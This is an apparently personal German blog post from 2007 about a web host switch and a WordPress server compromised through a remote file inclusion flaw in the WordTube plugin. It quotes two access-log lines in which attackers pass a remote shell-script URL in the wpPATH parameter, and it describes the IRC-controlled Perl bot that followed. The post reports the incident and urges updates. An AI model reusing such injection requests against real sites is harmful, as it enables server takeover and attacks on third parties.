Jetzt aber wirklich wieder online ;) Tja, was soll ich sagen, 1blu hat es nicht für wichtig erachtet hat meinen vServer wieder in Ordnung zu bringen oder meinem Onkel (ist auch auf dem Server) und mir E-Mails, die uns jetzt fehlen, zu Verfügung zu stellen. Jetzt fehlen uns von einer Woche Rechnungen oder sonstige E-Mails. Auch war man nicht in der Lage entsprechende DNS-/MX-Einträge zu ändern. 1blu hat wirklich keine Anstalten gemacht mir/uns zu helfen. Stattdessen wurde ich auch noch von der Hotline unverschämt angemacht: „Ich kann Ihnen zu den Problem keine Auskunft geben. Wir haben das Problem an die Technik weitergegeben. Wenn wir jetzt noch weiter 10 Minuten länger telefonieren, dann dauert das Problem noch 4 Wochen.“
Unglaublich so etwas von einem Mitarbeiter der Kundenhotline zu hören. Oder? Das ganze habe ich mir nicht lange angeschaut und habe schnell einen vServer bei 1&1 angemietet. Auf diesem läuft jetzt auch dieser Blog. Ehrlich gesagt bin sogar etwas beeindruckt von 1&1 wie schnell und effektiv dort an der Kundenhotline gearbeitet wurde. Bisherige Probleme wurden immer innerhalb von 2 Tagen gelöst und von der Kundenhotline sind detailierte Informationen zu bekommen.
Leider war ich durch diesen „unfrewilligen“ Umzug gezwungen eine alter Version des Blog auf den 1&1 vServer zu spielen. Dieses wurde auch gleich am ersten Tag (27./28. Mai) bestraft. Der vServer wurde durch einen Fehler in einem alten PlugIn für DoS-Attacken gegen einen Brasilianischen Server benutzt. Das betroffene PlugIn war WordTube von Alex Rabe. Anfang Mai wurde auch schon auf einigen Sites und Blogs über dieses Problem berichtet. Durch diese Sicherheitslücke konnten Angreifer eigene PHP-Skripte einbinden und mit den Rechten des Webservers ausführen. Schuld war die fehlerhafte Verarbeitung des von dem Plug-in verarbeiteten Parameter wppath in den Modulen wordtube-button.php und js/wptable-button.php. Die Dateien werden dann meistens im tmp-Verzeichnis des vServers kopiert und von dort auch aufgerufen. In den Logfiles vom Webserver schaut das dann so aus:
[28/May/2007:04:34:28 +0200] „GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=
http://www.hackermalaysia.org/warez/r57.txt? HTTP/1.1“ 200 20 „-“ „Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3“
[28/May/2007:04:39:25 +0200] „GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=
http://www.hackermalaysia.org/warez/r57.txt? HTTP/1.1“ 200 20 „-“ „Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3“
In diesen Dateien ist dann ein PERL-Script, welches dann Verbindung mit einem IRC-Server aufnimmt und auch von dort die entsprechenden Informationen für einen Angriff bekommt.
Ich kann mich nur den ganzen Blogs im Netz anschliessen und Euch empfehlen die 4 PlugIns von Alex Rabe auf die aktuellste Version zu aktualisieren. Denn das war die Ursache, dass der vServer für 2 Tage bei 1&1 gesperrt war. Durch Entsperrungs-Fax wurde dieser dann wieder freigeschaltet. Ich teilte dann noch telefonisch 1&1 mit, woran es gelegen hat, falls es noch andere Kunden betrifft. Ich sollte mich mal nach einem PlugIn für die WordPress-PlugIns umsehen, welches mir anzeigt das Updates für das PlugIn vorhanden sind. Gibt es vielleicht schon eins? Wie macht ihr das denn?